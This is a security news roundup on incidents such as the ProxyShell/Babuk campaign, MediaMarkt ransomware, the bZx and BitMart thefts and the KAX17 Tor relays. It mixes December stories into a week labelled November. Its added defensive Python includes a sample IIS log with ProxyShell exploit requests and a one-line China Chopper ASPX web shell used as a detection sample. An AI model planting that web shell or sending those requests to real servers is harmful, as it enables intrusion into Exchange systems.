
Overview of security incidents for the period from 4 to 10 November 2021



A brief overview of the main events in the world of information security for the week.

Unknown attackers stole $55 million from the bZx DeFi platform, a US defense contractor disclosed the theft of files from a compromised email account, China accused a foreign intelligence service of hacking its airlines, and the Hive ransomware gang attacked Europe's largest electronics retailer. Read about these and other high-profile information security events for the period from 4 to 10 November 2021 in our review.

Cisco Talos researchers have uncovered a new campaign in which Babuk ransomware operators target the ProxyShell vulnerabilities in Microsoft Exchange servers. The attackers exploit the flaws to plant a China Chopper web shell for initial access and then use it to deploy the Babuk payload. The vulnerabilities (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207) were patched in April and May of this year, and technical details were published in August.
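The two artifacts in this campaign that a defender can hunt for in IIS logs and on disk are the ProxyShell path-confusion request (an Autodiscover request whose Email= parameter itself names autodiscover.json, with the real backend path smuggled after an @) and the one-line China Chopper ASPX body. The following is an added example, not Cisco Talos code or anything from the page: the log excerpt and the web shell bodies are constructed, the IIS field order is assumed, and the /aspnet_client/ drop-directory rule is a heuristic, not an official indicator.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed IIS W3C log excerpt (not from any real server). Field order assumed:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
# IIS writes spaces inside the User-Agent as '+', so a plain split on ' ' is safe here.
IIS_FIELDS = ["date", "time", "s_ip", "method", "stem", "query", "port",
              "user", "c_ip", "user_agent", "status"]

SAMPLE_IIS_LOG = """\
2021-11-05 02:14:01 10.0.0.5 GET /owa/auth/logon.aspx url=%2fowa%2f 443 - 198.51.100.7 Mozilla/5.0 200
2021-11-05 02:15:22 10.0.0.5 POST /autodiscover/autodiscover.json @evil.corp/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.corp 443 - 198.51.100.7 python-requests/2.26.0 200
2021-11-05 02:15:40 10.0.0.5 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dz&Email=autodiscover/autodiscover.json%3F@evil.corp 443 - 198.51.100.7 python-requests/2.26.0 200
2021-11-05 02:18:03 10.0.0.5 POST /aspnet_client/shell.aspx - 443 - 198.51.100.7 Mozilla/5.0 200
2021-11-05 02:20:11 10.0.0.5 GET /ecp/default.aspx - 443 CORP\\alice 192.0.2.44 Mozilla/5.0 200
"""

# Constructed file bodies: the classic one-line China Chopper ASPX, and a harmless page.
SAMPLE_CHOPPER_ASPX = '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>'
SAMPLE_BENIGN_ASPX = '<%@ Page Language="C#" %><html><body>Hello</body></html>'

# ProxyShell path confusion: Autodiscover is asked to proxy a request whose Email=
# parameter contains "autodiscover/autodiscover.json", with the backend path after an '@'.
PROXYSHELL_EMAIL_RE = re.compile(r"Email=autodiscover/autodiscover\.json(%3F|\?)", re.I)
PROXYSHELL_BACKEND_RE = re.compile(r"@[^/\s]+/(mapi/nspi|powershell|ews)\b", re.I)
# Heuristic: Exchange ships no .aspx content under /aspnet_client/, a common shell drop path.
SHELL_DROP_RE = re.compile(r"^/aspnet_client/.+\.aspx$", re.I)
# China Chopper ASPX: eval(Request.Item["<password>"], "unsafe")
CHINA_CHOPPER_RE = re.compile(
    r'eval\s*\(\s*Request\.Item\[\s*"[^"]+"\s*\]\s*,\s*"unsafe"\s*\)', re.I)


@dataclass(frozen=True)
class Finding:
    line_no: int
    client_ip: str
    rule: str
    detail: str


def parse_iis_line(line: str) -> Optional[dict]:
    """Split one W3C log line into the assumed fields; skip comments and short lines."""
    parts = line.strip().split(" ")
    if not parts or parts[0].startswith("#") or len(parts) < len(IIS_FIELDS):
        return None
    return dict(zip(IIS_FIELDS, parts))


def scan_iis_log(text: str) -> List[Finding]:
    """Return one finding per log line that matches a ProxyShell or web shell rule."""
    findings: List[Finding] = []
    for n, raw in enumerate(text.splitlines(), 1):
        rec = parse_iis_line(raw)
        if rec is None:
            continue
        stem, query = rec["stem"], rec["query"]
        if stem.lower().endswith("/autodiscover/autodiscover.json") and (
                PROXYSHELL_EMAIL_RE.search(query) or PROXYSHELL_BACKEND_RE.search(query)):
            findings.append(Finding(n, rec["c_ip"], "proxyshell-ssrf", query))
        elif SHELL_DROP_RE.match(stem):
            findings.append(Finding(n, rec["c_ip"], "webshell-path", stem))
    return findings


def is_china_chopper(body: str) -> bool:
    """True if a file body carries the China Chopper eval(Request.Item[...], "unsafe") pattern."""
    return CHINA_CHOPPER_RE.search(body) is not None


if __name__ == "__main__":
    for f in scan_iis_log(SAMPLE_IIS_LOG):
        print(f"line {f.line_no}: {f.rule} from {f.client_ip}: {f.detail}")
    print("chopper:", is_china_chopper(SAMPLE_CHOPPER_ASPX), is_china_chopper(SAMPLE_BENIGN_ASPX))
```

The two ProxyShell hits come from the same client within seconds, first against /mapi/nspi (to learn a mailbox SID) and then against /powershell with an X-Rps-CAT token, followed by a POST to a fresh .aspx file: that ordering, rather than any single line, is the chain worth alerting on.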

MediaMarkt, a large electronics and home appliance retailer, was hit by the Hive ransomware, which shut down its IT systems and prevented stores in Germany and the Netherlands from operating normally. The attackers demanded $240 million from MediaMarkt to decrypt the files. The attack affected retail stores across Europe, mainly in the Netherlands. Online sales were unaffected, but cash registers could not accept credit cards or print receipts, and returns could not be processed because previous purchases could not be looked up.

The Chinese government said that in 2020 a foreign intelligence agency hacked several Chinese airlines and stole passenger data. The campaign was disclosed last week by officials of the Ministry of State Security, after one of the affected airlines reported a data breach to it in January 2020. Investigators linked the intrusion to a custom Trojan used to exfiltrate passenger data, and a follow-up investigation showed that other airlines had been compromised in the same way.

An unidentified hacking group has attacked nine organizations, including at least one in the United States, CNN reports. The attackers broke into the networks of defense, energy and technology companies as well as healthcare and education institutions, and stole passwords from a number of them, giving them persistent access to those networks and the ability to intercept sensitive information sent by email or stored on internal systems. The group's tactics overlap with those of a known China-linked threat actor.

Electronic Warfare Associates (EWA), a US defense contractor, disclosed a compromise of its email system and the theft of files containing personal information. According to a breach notification EWA filed with the Montana Attorney General's Office, the attacker took control of one of the company's email accounts on August 2, 2021. The intrusion was discovered when the attacker attempted a fraud scheme, which the company believes was the main goal. The investigation found that names, Social Security numbers and driver's license data were exposed, and affected individuals have been notified.

Attackers targeted the popular investment and trading platform Robinhood, obtained the email addresses and full names of its customers, and demanded a ransom. The incident was the result of social engineering against a customer support employee: the attackers convinced the employee that they were authorized to access certain customer support systems and, through that access, obtained the email addresses of about 5 million customers and the full names of about 2 million more. For a smaller group of customers the exposure was more serious: names, dates of birth and ZIP codes were compromised, and for around ten customers more extensive account details were exposed.

One of the most notable incidents of the week was the theft of $55 million in cryptocurrency from the DeFi platform bZx, which lets users lend, borrow and speculate on cryptocurrency price movements. A bZx developer received a phishing email with a Word document containing malicious macros disguised as a legitimate attachment. Opening it ran a script on the developer's computer that captured the mnemonic seed phrase for his cryptocurrency wallet. The attacker drained that wallet and also obtained two private keys used to integrate bZx with the Polygon and Binance Smart Chain (BSC) networks. With those keys the attacker drained bZx's own funds on Polygon and BSC, along with the funds of a small number of users who had granted unlimited token spending approvals (allowances) to the affected contracts on both chains.
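The user losses in this incident came from a standing ERC-20 allowance, not from the users' own keys: an approve(spender, amount) call with amount set to the maximum uint256 lets the spender contract move tokens forever, so whoever controls that contract's keys controls the tokens. The following added example (not bZx code or anything from the page) shows how to ABI-encode and decode approve() calldata, flag effectively unlimited allowances in a wallet's transaction history, and build the approve(spender, 0) call that revokes one. The spender addresses and transaction list are constructed, and the 2**128 "unlimited" cut-off is a heuristic.

```python
from typing import Dict, List, Optional, Tuple

# Function selectors are the first 4 bytes of keccak256(signature). They are hardcoded here
# because the Python standard library has no Keccak-256 (hashlib.sha3_256 uses SHA-3 padding).
APPROVE_SELECTOR = bytes.fromhex("095ea7b3")   # approve(address,uint256)
TRANSFER_SELECTOR = bytes.fromhex("a9059cbb")  # transfer(address,uint256)
MAX_UINT256 = 2**256 - 1
# Heuristic: no token has anywhere near 2**128 base units in existence, so any allowance at
# or above it is "effectively unlimited" whether the wallet used MAX_UINT256, 2**255, etc.
UNLIMITED_THRESHOLD = 2**128


def encode_approve(spender: str, amount: int) -> bytes:
    """ABI-encode approve(spender, amount): selector + left-padded 20-byte address + uint256."""
    hex_addr = spender.lower()
    if hex_addr.startswith("0x"):
        hex_addr = hex_addr[2:]
    addr = bytes.fromhex(hex_addr)
    if len(addr) != 20:
        raise ValueError("spender must be a 20-byte hex address")
    if not 0 <= amount <= MAX_UINT256:
        raise ValueError("amount out of uint256 range")
    return APPROVE_SELECTOR + addr.rjust(32, b"\x00") + amount.to_bytes(32, "big")


def decode_approve(calldata: bytes) -> Optional[Tuple[str, int]]:
    """Return (spender, amount) for a well-formed approve() call, else None."""
    if len(calldata) != 4 + 32 + 32 or calldata[:4] != APPROVE_SELECTOR:
        return None
    if calldata[4:16] != b"\x00" * 12:   # an address word must be zero-padded on the left
        return None
    spender = "0x" + calldata[16:36].hex()
    amount = int.from_bytes(calldata[36:68], "big")
    return spender, amount


def classify_approval(calldata: bytes) -> Optional[str]:
    """'unlimited', 'bounded' or 'revoke' for approve() calldata; None for anything else."""
    decoded = decode_approve(calldata)
    if decoded is None:
        return None
    _, amount = decoded
    if amount == 0:
        return "revoke"
    if amount >= UNLIMITED_THRESHOLD:
        return "unlimited"
    return "bounded"


def revoke_calldata(spender: str) -> bytes:
    """The transaction that removes a standing allowance: approve(spender, 0)."""
    return encode_approve(spender, 0)


def unlimited_spenders(txs: List[bytes]) -> List[str]:
    """Replay approve() calls in order (a later approve overwrites the allowance) and
    return the spenders that still hold an effectively unlimited allowance."""
    allowance: Dict[str, int] = {}
    for calldata in txs:
        decoded = decode_approve(calldata)
        if decoded is None:
            continue
        spender, amount = decoded
        allowance[spender] = amount
    return sorted(s for s, a in allowance.items() if a >= UNLIMITED_THRESHOLD)


# Constructed wallet history: made-up spender contracts, not any real deployment.
HYPOTHETICAL_ROUTER = "0x" + "11" * 20
HYPOTHETICAL_VAULT = "0x" + "22" * 20
SAMPLE_TXS = [
    encode_approve(HYPOTHETICAL_ROUTER, MAX_UINT256),     # "infinite approval" prompt accepted
    encode_approve(HYPOTHETICAL_VAULT, 1_000 * 10**18),  # bounded: 1000 tokens, 18 decimals
    encode_approve(HYPOTHETICAL_VAULT, 0),                # later revoked
    TRANSFER_SELECTOR + b"\x00" * 64,                     # a transfer, not an approval
]

if __name__ == "__main__":
    for tx in SAMPLE_TXS:
        print(classify_approval(tx), decode_approve(tx))
    for spender in unlimited_spenders(SAMPLE_TXS):
        print("revoke", spender, revoke_calldata(spender).hex())
```

Approving exactly the amount a transaction needs, rather than MAX_UINT256, limits what a later compromise of the spender contract can take; the cost is one extra approve() per interaction.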

The week also saw large-scale data leaks. A database of 45.5 million users of mobile VPN services has leaked online. It contains email addresses, encrypted passwords, registration dates, profile update dates and last login dates, covering 2017 to 2021.

Participants in the Zero Day Initiative's Pwn2Own Austin 2021 contest won awards for hacking printers for the first time in the event's history. On the first day, researchers earned more than $360,000 in total for exploiting vulnerabilities in printers, NAS devices, routers and smart speakers.

Another interesting case is the lockout of the account of Instagram head Adam Mosseri. A person using the pseudonym Syenrai was able to temporarily lock Mosseri's account by convincing support that he had died. The lockout abused Instagram's ability to memorialize the accounts of deceased users. Syenrai explained that some scammers even offer paid services to get Instagram users banned this way: for an unverified account with fewer than a million followers, any recently published obituary found on the Web is accepted as proof of death, and it can take the victim several days to regain access.

The Cybersecurity and Infrastructure Security Agency (CISA) has warned that proof-of-concept (PoC) code for the BrakTooth vulnerabilities in Bluetooth is now publicly available. BrakTooth is the collective name for a family of 16 vulnerabilities in commercial Bluetooth Classic (BR/EDR) stacks, affecting chips that support Bluetooth 3.0 + HS through Bluetooth 5.2.



Hackers breached the BitMart crypto exchange and stole $150 million



The company is investigating the incident and has temporarily suspended withdrawals.

Crypto exchange BitMart reported that it was hacked and lost about $150 million worth of cryptocurrency.

Founder and CEO Sheldon Xia confirmed the incident and clarified that the breach involved the exchange's Ethereum (ETH) and Binance Smart Chain (BSC) hot wallets.

“We have identified a large-scale security breach involving one of our hot ETH wallets and one of our hot BSC wallets. At the moment, we are still drawing conclusions about the possible methods used. The hackers managed to withdraw assets worth about $150 million,” Xia wrote on his Twitter account.

On the evening of December 4, blockchain security firm PeckShield recorded an abnormal number of withdrawals from BitMart. Among the tokens withdrawn from the trading platform were “meme” tokens, including Shiba Inu, as well as the USDC stablecoin.

Recall that earlier hackers stole about $120 million in bitcoin and ether from BadgerDAO, a decentralized finance (DeFi) protocol built around bitcoin-backed tokens.



Electric utility lost 25 years of data in a cyberattack



All indications are that the company has fallen victim to ransomware.

Colorado’s Delta-Montrose Electric Association (DMEA) is painfully recovering from a devastating cyberattack that destroyed 25 years of its data. The attack last month forced the utility to shut down 90% of its internal computer systems.

A new notice DMEA sent to its customers this week says the company will resume accepting payments through the SmartHub platform and other payment terminals by December 6. It hopes to restore billing on December 6-10, so customers should expect a backlog of electricity bills to arrive at once. DMEA also said it will not disconnect service for non-payment or charge penalties until January 31, 2022.

Employees first noticed something was wrong on November 7, and shortly afterwards almost the entire DMEA computer network was taken offline. The attack affected all support systems, payment processing tools, billing platforms and other customer-facing tools. According to the company, the attackers targeted specific segments of the internal network and corrupted documents, spreadsheets and forms, which points to a ransomware attack.

Telephone systems and email were also affected, but the power grid and the fiber-optic network were not. DMEA says no personal data of customers or employees was compromised.

DMEA has brought in cybersecurity experts to investigate the incident but is still struggling to rebuild its network.

“We are currently working with limited functionality and are focused on completing investigations and restoring services as efficiently, cost-effectively and securely as possible. We strive to restore our network and get back to normal operations, but this will take time and requires a phased approach,” the company said.



Hundreds of malicious Tor nodes are used to de-anonymize users



Malicious relays were added to the Tor network continuously, and there were hundreds of them.

Since at least 2017, a mysterious attacker (or group), tracked by security researchers as KAX17, has been adding malicious relays to the Tor network that act as entry, middle and exit nodes. According to a security researcher using the pseudonym Nusenu, the campaign aims to de-anonymize Tor users.

Nusenu, who is a Tor relay operator, first noticed the activity in 2019 but says KAX17 has been active since at least 2017. According to Nusenu, relays with no contact information were added to the network continuously, hundreds in total; at its peak the group ran over 900 relays.

Relays added to the Tor network are expected to publish contact information (such as an email address) so that the Tor Project or law enforcement can reach the operator in case of misconfiguration or abuse reports. Despite this convention, relays without contact information are routinely added to the network, largely because they boost the relay count.

KAX17 relays are hosted in data centers around the world and are mostly configured as entry (guard) and middle relays, with only a small number operating as exit nodes. As Nusenu notes, this is unusual: most operators of malicious relays run exit nodes, which let them tamper with traffic. For example, the BTCMITM20 group ran thousands of malicious exit relays to attack users visiting cryptocurrency-related sites.

According to the researcher, KAX17 is collecting information about users connecting to the Tor network and about their routes through it. Nusenu reported the findings to the Tor Project last year, and the relays were removed from the network in October 2020. Soon afterwards another batch of relays with no contact information appeared, but whether it was linked to KAX17 is unclear.

In October and November 2021 the Tor Project again removed hundreds of KAX17 relays. Neither Nusenu nor the Tor Project have speculated publicly about who is behind KAX17.
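What made KAX17 visible was not any single relay but a pattern: hundreds of contact-less relays, concentrated in guard and middle positions, accumulating consensus weight. The check below is an added example, not Nusenu's tooling or anything from the page. It walks relay records in the shape of the Tor Project's public Onionoo "details" document (https://onionoo.torproject.org/details) and reports what share of guard, middle and exit weight is held by relays with no ContactInfo, and which autonomous systems cluster such relays. The relay records are constructed, the flag-based position split is a simplification of Tor's bandwidth-weighted path selection, and the AS cluster threshold is an assumption.

```python
import json
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed records in the shape of Onionoo's "relays" array. Nicknames, fingerprints,
# ASNs and weights are made up; "Unnamed" is simply tor's default relay nickname.
SAMPLE_ONIONOO = json.dumps({"relays": [
    {"nickname": "kindrelay", "fingerprint": "A" * 40, "contact": "ops@example.org",
     "flags": ["Fast", "Guard", "Running", "Stable"], "consensus_weight": 20000, "as": "AS64496"},
    {"nickname": "kindexit", "fingerprint": "B" * 40, "contact": "abuse@example.net",
     "flags": ["Exit", "Fast", "Running"], "consensus_weight": 15000, "as": "AS64497"},
    {"nickname": "Unnamed", "fingerprint": "C" * 40,
     "flags": ["Fast", "Guard", "Running"], "consensus_weight": 9000, "as": "AS64511"},
    {"nickname": "Unnamed", "fingerprint": "D" * 40,
     "flags": ["Fast", "Running"], "consensus_weight": 6000, "as": "AS64511"},
    {"nickname": "Unnamed", "fingerprint": "E" * 40, "contact": "",
     "flags": ["Fast", "Guard", "Running"], "consensus_weight": 5000, "as": "AS64511"},
]})


def load_relays(text: str) -> List[dict]:
    """Parse an Onionoo details document and return its relay records."""
    return json.loads(text)["relays"]


def has_contact(relay: dict) -> bool:
    """A missing or blank ContactInfo both count as 'no contact'."""
    return bool(relay.get("contact", "").strip())


def position(relay: dict) -> str:
    """Coarse position from flags: Exit-flagged relays can be exits, Guard-flagged ones
    entries, everything else is middle-only. Real path selection also weights by bandwidth."""
    flags = set(relay.get("flags", []))
    if "Exit" in flags:
        return "exit"
    if "Guard" in flags:
        return "guard"
    return "middle"


def no_contact_weight_share(relays: List[dict]) -> Dict[str, float]:
    """Fraction of consensus weight per position held by relays without ContactInfo."""
    total: Dict[str, int] = defaultdict(int)
    no_contact: Dict[str, int] = defaultdict(int)
    for r in relays:
        pos, w = position(r), r.get("consensus_weight", 0)
        total[pos] += w
        if not has_contact(r):
            no_contact[pos] += w
    return {pos: no_contact[pos] / total[pos] for pos in total if total[pos]}


def no_contact_clusters(relays: List[dict], min_relays: int = 2) -> List[Tuple[str, int, int]]:
    """Autonomous systems hosting at least min_relays contact-less relays, as
    (AS, relay count, summed consensus weight), heaviest first."""
    count: Dict[str, int] = defaultdict(int)
    weight: Dict[str, int] = defaultdict(int)
    for r in relays:
        if has_contact(r):
            continue
        asn = r.get("as", "unknown")
        count[asn] += 1
        weight[asn] += r.get("consensus_weight", 0)
    clusters = [(asn, count[asn], weight[asn]) for asn in count if count[asn] >= min_relays]
    return sorted(clusters, key=lambda c: c[2], reverse=True)


if __name__ == "__main__":
    relays = load_relays(SAMPLE_ONIONOO)
    for pos, share in sorted(no_contact_weight_share(relays).items()):
        print(f"{pos:6s} no-contact weight share: {share:.1%}")
    for asn, n, w in no_contact_clusters(relays):
        print(f"{asn}: {n} contact-less relays, weight {w}")
```

In the constructed set, contact-less relays hold about 41% of guard weight and all of the middle weight but none of the exit weight, and all of them sit in one AS; that is the KAX17-style profile, as opposed to the exit-heavy footprint of a traffic-tampering operator such as BTCMITM20.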

